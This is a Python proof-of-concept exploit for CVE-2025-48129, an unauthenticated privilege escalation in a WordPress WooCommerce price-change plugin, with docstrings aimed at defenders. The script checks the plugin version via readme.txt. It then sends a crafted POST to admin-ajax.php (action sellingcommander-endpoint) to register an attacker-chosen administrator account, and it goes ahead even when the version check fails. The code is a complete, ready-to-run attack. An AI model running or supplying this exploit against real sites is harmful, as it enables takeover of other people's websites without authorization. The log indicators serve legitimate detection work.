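"""Proof-of-concept client for CVE-2025-48129.

The script targets the WordPress plugin
"excel-like-price-change-for-woocommerce-and-wp-e-commerce-light"; its own
command-line description calls the issue an unauthenticated privilege
escalation.

Notes for defenders reading this file:

* Observable traffic: a GET for the plugin's ``readme.txt`` followed by a
  POST to ``wp-admin/admin-ajax.php?action=sellingcommander-endpoint`` with
  the form fields ``scemail``, ``consumer_key`` and ``consumer_secret``.
  These are the strings to look for in access logs or to match in a
  request filter.
* The script treats plugin releases up to and including 2.4.37 as affected.
  Sites running such a release should update the plugin (or deactivate it
  until they can) and audit administrator accounts for unexpected additions
  or password changes.
"""
import argparse
import hashlib
import time
from urllib.parse import urljoin

import requests

# Every request below is sent with verify=False, so certificate warnings are
# silenced here. With verification off, nothing a server answers can be
# trusted to come from the intended host.
requests.packages.urllib3.disable_warnings()

# Exploit By: Nxploited ( Khaled_alenazi)

# Last plugin release this script reports as affected.
LAST_AFFECTED_VERSION = (2, 4, 37)


def format_url(url):
    """Return *url* with a scheme and a trailing slash.

    ``http://`` is prepended when no http/https scheme is present, and a
    ``/`` is appended when missing, so that ``urljoin`` keeps the full base.
    """
    if not url.startswith(("http://", "https://")):
        url = "http://" + url
    return url if url.endswith("/") else url + "/"


def _parse_version(text):
    """Convert a dotted version string such as ``"2.4.37"`` to a tuple of ints.

    Raises:
        ValueError: if a component is not numeric (for example ``"trunk"``).
    """
    return tuple(int(part) for part in text.split("."))


def check_version(base_url):
    """Read the plugin's readme.txt and report whether its version is affected.

    The result is only printed; nothing is returned, and the caller continues
    regardless of the outcome.

    Versions are compared numerically, component by component. A plain string
    comparison misorders releases: ``"2.4.4" <= "2.4.37"`` is False and
    ``"2.10.0" <= "2.4.37"`` is True, so affected installs could be reported
    as safe and vice versa.
    """
    readme_url = urljoin(
        base_url,
        "wp-content/plugins/excel-like-price-change-for-woocommerce-and-wp-e-commerce-light/readme.txt",
    )
    print("[*] Checking plugin version...")
    try:
        response = requests.get(readme_url, timeout=10, verify=False)
        if response.status_code == 200:
            if "Stable tag:" in response.text:
                for line in response.text.splitlines():
                    if "Stable tag:" in line:
                        version = line.split("Stable tag:")[1].strip()
                        # A non-numeric tag raises ValueError, which the
                        # handler below reports as "could not verify".
                        if _parse_version(version) <= LAST_AFFECTED_VERSION:
                            print("[*] Plugin version:", version)
                            print("[*] Vulnerable version detected. Exploiting...")
                            time.sleep(3)
                        else:
                            print("[*] Plugin is not vulnerable (version:", version + ")")
            else:
                print("[*] Plugin version not found in readme.txt. Proceeding with exploitation.")
        else:
            print("[*] readme.txt not accessible. Skipping version check.")
    except Exception:
        # Deliberately best-effort: network errors and unparsable version
        # strings both end up here and are only reported.
        print("[*] Could not verify plugin version. Proceeding with exploitation.")


def exploit(base_url, email, password):
    """Send the single POST request this proof of concept consists of.

    Args:
        base_url: Site root as produced by ``format_url``.
        email: Value sent in the ``scemail`` form field.
        password: Plaintext whose MD5 hex digest is sent as ``consumer_key``.

    The function returns early only when the request itself raises. In every
    other case, including a non-200 response, the credential summary is still
    printed, so that output is not evidence that anything changed on the site.
    """
    # The value sent, and later printed as "Password", is the MD5 hex digest,
    # not the plaintext.
    hashed_pw = hashlib.md5(password.encode()).hexdigest()
    ajax_url = urljoin(base_url, "wp-admin/admin-ajax.php?action=sellingcommander-endpoint")
    # Fixed browser-like User-Agent; on its own it is not a reliable indicator.
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    }
    data = {
        "scemail": email,
        "consumer_key": hashed_pw,
        "consumer_secret": "xyz",
    }
    try:
        response = requests.post(ajax_url, data=data, headers=headers, verify=False, timeout=15)
        if response.status_code == 200:
            # The script reads either of these markers in the body as success.
            if "rest_no_route" in response.text or "No route was found" in response.text:
                print("[+] Exploitation successful!")
            else:
                print("[+] Exploit sent. Review the site manually.")
        else:
            print("[-] Exploitation failed (HTTP", response.status_code, ")")
    except Exception as e:
        print("[-] Error sending request:", str(e))
        return
    print("\n[*] Login credentials:")
    print(" Username:", email)
    print(" Password:", hashed_pw)
    print(f"\n[*] If login fails, reset the password manually via:\n {urljoin(base_url, 'wp-login.php?action=lostpassword')}")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="CVE-2025-48129 - Unauthenticated Privilege Escalation Exploit by Khaled Alenazi (Nxploited)"
    )
    parser.add_argument("-u", "--url", required=True, help="Target WordPress site URL (e.g., http://site.com/)")
    parser.add_argument("-mail", "--mail", required=True, help="Email for the new Admin account")
    parser.add_argument("-p", "--password", default="nxploitadmin", help="Password to set (default: nxploitadmin)")
    args = parser.parse_args()
    base_url = format_url(args.url)
    check_version(base_url)
    exploit(base_url, args.mail, args.password)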